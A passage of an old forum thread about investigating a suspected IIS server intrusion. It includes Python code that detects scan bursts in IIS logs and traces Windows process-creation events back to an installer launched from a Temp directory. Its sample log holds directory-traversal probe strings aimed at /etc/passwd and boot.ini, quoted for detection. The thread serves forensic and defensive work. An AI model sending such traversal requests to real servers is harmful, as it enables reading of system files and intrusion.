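2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /index.htm PageServices 200 0 29 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /cgi-bin/view-source ../../../../../../../etc/passwd 404 4184 67 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /carbo.dll icatcommand=..\..\..\..\boot.ini&catalogname=catalog 404 4184 78 16 - -
2003-08-02 05:55:41 10.0.0.7 - W3SVC1 MYSERVER 192.168.0.1 80 GET /index.htm - 200 0 29 0 - -
"""

if __name__ == "__main__":
    for r in find_scan_bursts(SAMPLE_LOG.splitlines()):
        if r["flagged"]:
            print(f"scan burst from {r['client']} at {r['when']}: {r['distinct_uris']} "
                  f"distinct URIs, {r['urlscan_rejected']} UrlScan rejects, "
                  f"self-sourced={r['self_sourced']}, families={r['families']}")
```

Run against the full log this reports one flagged burst from 192.168.0.1 with the self_sourced flag set, which is the detail worth chasing: a client address identical to the server's own means the request came through a NAT or proxy in front of the box, or from a process already running on it, and only the firewall or Snort capture can say which. The one 200 in the posted log (/index.htm) is the scanner fetching the front page, not a success for the attacker.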
- Posted by Frank Cusack on August 4th, 2003
On Sun, 03 Aug 2003 01:51:49 GMT "Frank" <frank@nospamplease.com> wrote:
nope
/fc
- Posted by George Hester on August 4th, 2003
I saw no successes in your IIS log. Believe me, if that were true for all your connections you wouldn't be serving anything.
--
George Hester
__________________________________
"Frank" <frank@nospamplease.com> wrote in message news:VUZWa.36782$Vt6.14734@rwcrnsc52.ops.asp.att.net...
- Posted by Patrick Kremer on August 5th, 2003
I don't know how it relates to this whole thing, but A~NSISu_.exe sounds
quite a bit like Nullsoft Install System (create a Win32 self-extracting
executable installer) http://www.nullsoft.com/free/nsis/.
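Whatever the installer turns out to be, the question Frank asked (how did they get in) is the one his own event log can start to answer: with Detailed Tracking auditing on, every 592 records a Creator Process ID, so the 592 whose New Process ID is 1916 names whatever launched A~NSISu_.exe, and the 592s whose creator is 1764 show what it spawned. The Python below is an added example, not code from anyone in this thread, that parses exported 592 events, flags images run out of a Temp directory and walks the creator chain in both directions. The first sample record is the event as Frank posted it; the three child records (cmd.exe, nbtstat.exe, route.exe with PIDs 1800/1820/1832 and their times and paths) are constructed for illustration, and the absence of any record for PID 1916 is likewise an assumption, there to show how the walk ends when the parent predates the export.

```python
import re

# Matches \Temp\ in any case, including the 8.3 short form ...\LOCALS~1\Temp\
# that the posted event shows.
TEMP_DIR = re.compile(r"\\temp\\", re.I)


def parse_event(text):
    """Turn one exported 'Key: value' event into a dict. Split on the first
    colon only, so values such as '2:50:28 AM' keep their colons."""
    fields = {}
    for raw in text.splitlines():
        key, sep, value = raw.partition(":")
        if sep and value.strip():
            fields[key.strip()] = value.strip()
    return fields


def load_processes(events_text):
    """Index the 592 (process creation) events by new PID; other IDs are skipped."""
    procs = {}
    for block in re.split(r"\n\s*\n", events_text.strip()):
        ev = parse_event(block)
        if ev.get("Event ID") != "592":
            continue
        pid = int(ev["New Process ID"])
        procs[pid] = {
            "pid": pid,
            "ppid": int(ev["Creator Process ID"]),
            "image": ev["Image File Name"],
            "user": ev.get("User Name"),
            "time": ev.get("Time"),
            "runs_from_temp": bool(TEMP_DIR.search(ev["Image File Name"])),
        }
    return procs


def ancestry(procs, pid):
    """Follow Creator Process ID upwards. Returns the chain found and the first
    PID that has no 592 of its own (it started before the export began, or
    before Detailed Tracking was switched on). 'seen' guards against PID reuse."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(procs[pid])
        pid = procs[pid]["ppid"]
    return chain, pid


def descendants(procs, pid):
    """Every process transitively spawned by pid, parents before children."""
    out, frontier = [], [pid]
    while frontier:
        parent = frontier.pop(0)
        kids = sorted((p for p in procs.values() if p["ppid"] == parent),
                      key=lambda p: p["pid"])
        out.extend(kids)
        frontier.extend(k["pid"] for k in kids)
    return out


def suspicious(procs):
    """Processes launched out of a Temp directory: the triage starting point."""
    return [p for p in procs.values() if p["runs_from_temp"]]


# Constructed sample. The first record is the event from the post; the three
# that follow are assumed for illustration (PIDs, times and paths are made up)
# to mirror the processes the post says appeared next. Nothing is recorded
# for PID 1916, the realistic case when the export starts after that process.
SAMPLE_EVENTS = r"""
Event Type: Success Audit
Event Source: Security
Event Category: Detailed Tracking
Event ID: 592
Date: 8/2/2003
Time: 2:50:28 AM
User: MYSERVER\MyAdmin
Computer: MYSERVER
Description:
A new process has been created:
New Process ID: 1764
Image File Name: \DOCUME~1\ADMINI~1\LOCALS~1\Temp\A~NSISu_.exe
Creator Process ID: 1916
User Name: MyAdmin
Domain: MYSERVER
Logon ID: (0x0,0xDE65)

Event ID: 592
Time: 2:50:31 AM
New Process ID: 1800
Image File Name: \WINNT\system32\cmd.exe
Creator Process ID: 1764
User Name: MyAdmin

Event ID: 592
Time: 2:50:40 AM
New Process ID: 1820
Image File Name: \WINNT\system32\nbtstat.exe
Creator Process ID: 1800
User Name: MyAdmin

Event ID: 592
Time: 2:50:44 AM
New Process ID: 1832
Image File Name: \WINNT\system32\route.exe
Creator Process ID: 1800
User Name: MyAdmin
"""

if __name__ == "__main__":
    procs = load_processes(SAMPLE_EVENTS)
    for p in suspicious(procs):
        chain, missing = ancestry(procs, p["pid"])
        print(f"{p['image']} (pid {p['pid']}, {p['user']}, {p['time']})")
        print("  creator chain:", " <- ".join(str(c["pid"]) for c in chain),
              f"<- {missing} (no 592 in export)")
        for kid in descendants(procs, p["pid"]):
            print(f"  spawned: pid {kid['pid']} {kid['image']} at {kid['time']}")
```

The point of the missing-parent result is practical: if PID 1916 has no 592 in the export, pull the Security log from before the first scan rather than from the moment the installer appeared, and check the 528/540 logon events and the 592s for the Terminal Services and IIS worker processes around 02:50 to see which one owns that PID.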
- Posted by SAge on August 6th, 2003
First, of course, do a full updated scan looking for trojan horses and
other ills. If you know your program files and other system files
well, have a look for an odd-named file, possibly fitting in but
something may make it look odd. It could most likely be from 50k-1mb in
size, most averaging 150-550k. Next, if you need to do some
footprinting on the address you say may be the source, SamSpade.org
provides good tools. If you need further assistance you can contact
echo@echocct.org, attn: SAge. Essentially, however, you are only going
to find some basic info on this IP; if lucky they were dumb and didn't
proxy around first and it's a static IP. Most of the time, though, you
will find a proxy, a dead end 99.99%, or a dynamic DHCP type IP, also a
99.99% dead end. Even if you do find them, there is a 99.99% chance of
nothing coming of it. Other than that, look into SATAN or SAINT to
help check your own network, and lots of other tools to try and hack
yourself. That's the best way to find and plug your holes.
SAge
Echo CCT
www.echocct.org
"Frank" <frank@nospamplease.com> wrote in message news:<VUZWa.36782$Vt6.14734@rwcrnsc52.ops.asp.att.net>...
- Posted by d0x on July 17th, 2004
"... a dynamic DHCP type IP also 99.99% [dead]end"
this is not true. If you can trace back to an actual person's IP, you can
contact their ISP. Give the ISP the IP address, date and time that the
offense occurred, and your time zone. The ISP can look through their log
files to find out who was the last person to have the IP before the time
you gave.
From that, they can find out the person's MAC address and "null route"
them, i.e. assign them an IP address of 192.168.10.231, which will prevent
them from getting any internet access. When that person calls the ISP to
inquire about their internet connection, they will be caught. Of course
they could always just change their NIC, but I'm sure most people wouldn't
think to do that.
- Posted by Karl Levinson [x y] mvp on July 19th, 2004
d0x <dan@no.spam> wrote in message news:<pan.2004.07.17.22.47.16.464381@no.spam>...
Have you ever actually done that? In my experience, most ISPs won't
give that information or talk to you unless you're a law enforcement
person with a subpoena from a court in a country that the ISP
recognizes, and there isn't any language barrier, and you've contacted
them soon enough for them to preserve whatever logs they may or may
not have. Even then, there is a fair chance that what you'll find
isn't a perpetrator, but a virus-infected computer with a hidden proxy
or botnet running on it, or something similar.
- Posted by Chuckles on July 19th, 2004
Karl Levinson [x y] mvp wrote:
the person.
- Posted by Karl Levinson [x y] mvp on July 20th, 2004
"Chuckles" <Notthatyou@need.it> wrote in message
news:a5-dnRahPf0BZmbdRVn-gw@telcove.net...
Fair enough. Although if you look at www.mynetwatchman.com, you see that
they do this quite frequently, and they report much less than 1 in 5 success
rate.